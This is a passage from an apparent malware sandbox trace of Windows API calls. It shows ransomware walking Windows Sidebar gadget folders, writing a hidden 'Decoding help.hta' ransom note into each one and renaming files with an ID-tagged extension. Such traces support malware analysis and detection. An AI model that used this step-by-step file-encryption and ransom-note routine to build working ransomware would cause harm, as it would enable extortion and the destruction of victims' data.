cFileName="drag.png", cAlternateFileName="")) returned 1 [0045.228] lstrcpyW (in: lpString1=0x98a2850, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0045.228] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned 70 [0045.228] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta" [0045.228] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\decoding help.hta")) returned 0xffffffff [0045.228] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0045.551] WriteFile (in: hFile=0x1e8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1bf5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1bf5fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.552] CloseHandle (hObject=0x1e8) returned 1 [0045.552] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.817] lstrcmpiW (lpString1="Decoding help.hta", lpString2="drag.png") returned -1 [0048.817] lstrlenW (lpString="drag.png") returned 8 [0048.817] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0048.817] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned 70 [0048.817] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\", lpString2="drag.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png" [0048.817] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png" [0048.817] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" [0048.817] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\drag.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\drag.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.591] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0x1bf5fd30 | out: lpFindFileData=0x1bf5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22ad0a6d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0050.591] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0050.591] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0050.591] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0050.594] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0050.594] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned 70 [0050.594] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US" [0050.594] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" [0050.594] GlobalMemoryStatus (in: lpBuffer=0x1bf5fd10 | out: lpBuffer=0x1bf5fd10) [0050.594] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25277dd8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0050.739] CloseHandle (hObject=0x270) returned 1 [0050.739] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0x1bf5fd30 | out: lpFindFileData=0x1bf5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc467a55c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xc467a55c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xc467a55c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1d07, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0050.739] lstrcpyW (in: lpString1=0x253300c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0050.739] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned 70 [0050.739] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta" [0050.739] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\decoding help.hta")) returned 0x1 [0050.739] lstrcmpiW (lpString1="Decoding help.hta", lpString2="icon.png") returned -1 [0050.739] lstrlenW (lpString="icon.png") returned 8 [0050.739] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0050.739] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned 70 [0050.739] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\", lpString2="icon.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png" [0050.739] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png" [0050.739] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" [0050.739] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\icon.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\icon.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.740] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0x1bf5fd30 | out: lpFindFileData=0x1bf5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8199177f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8199177f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0050.740] lstrcmpW (lpString1=".", lpString2="images") returned -1 [0050.740] lstrcmpW (lpString1="..", lpString2="images") returned -1 [0050.740] lstrcmpiW (lpString1="windows", lpString2="images") returned 1 [0050.742] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0050.742] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned 70 [0050.742] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\", lpString2="images" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images" [0050.742] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0050.742] GlobalMemoryStatus (in: lpBuffer=0x1bf5fd10 | out: lpBuffer=0x1bf5fd10) [0050.742] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x253300c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0050.767] CloseHandle (hObject=0x270) returned 1 [0050.767] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0x1bf5fd30 | out: lpFindFileData=0x1bf5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbb4a6d2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbbb4a6d2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc6d0297c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0050.767] lstrcpyW (in: lpString1=0x25390260, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0050.767] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned 70 [0050.767] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta" [0050.767] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\decoding help.hta")) returned 0x1 [0050.767] lstrcmpiW (lpString1="Decoding help.hta", lpString2="logo.png") returned -1 [0050.767] lstrlenW (lpString="logo.png") returned 8 [0050.767] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0050.767] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned 70 [0050.767] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\", lpString2="logo.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png" [0050.767] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png" [0050.767] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" [0050.767] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\logo.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\rssfeeds.gadget\\logo.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.767] FindNextFileW (in: hFindFile=0x5e2e30, lpFindFileData=0x1bf5fd30 | out: lpFindFileData=0x1bf5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbb4a6d2, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbbb4a6d2, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc6d0297c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0050.768] FindClose (in: hFindFile=0x5e2e30 | out: hFindFile=0x5e2e30) returned 1 Thread: id = 430 os_tid = 0xba4 [0043.905] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*", lpFindFileData=0x1c09fd30 | out: lpFindFileData=0x1c09fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2cf0 [0045.168] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.169] FindNextFileW (in: hFindFile=0x5e2cf0, lpFindFileData=0x1c09fd30 | out: lpFindFileData=0x1c09fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.169] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.169] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.169] FindNextFileW (in: hFindFile=0x5e2cf0, lpFindFileData=0x1c09fd30 | out: lpFindFileData=0x1c09fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbafe414, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbbafe414, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb0b3b1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x7575, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0045.169] lstrcpyW (in: lpString1=0x10fef658, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0045.169] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned 71 [0045.169] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta" [0045.169] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\decoding help.hta")) returned 0xffffffff [0045.169] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0045.462] WriteFile (in: hFile=0x230, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1c09fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1c09fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.463] CloseHandle (hObject=0x230) returned 1 [0045.463] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.639] lstrcmpiW (lpString1="Decoding help.hta", lpString2="drag.png") returned -1 [0048.639] lstrlenW (lpString="drag.png") returned 8 [0048.639] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0048.639] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned 71 [0048.639] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\", lpString2="drag.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png" [0048.639] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png" [0048.639] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" [0048.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\drag.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\drag.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0049.885] FindNextFileW (in: hFindFile=0x5e2cf0, lpFindFileData=0x1c09fd30 | out: lpFindFileData=0x1c09fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229c575e, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0049.885] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0049.885] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0049.885] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0050.237] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0050.237] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned 71 [0050.237] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US" [0050.237] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\*.*" [0050.237] GlobalMemoryStatus (in: lpBuffer=0x1c09fd10 | out: lpBuffer=0x1c09fd10) [0050.238] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, 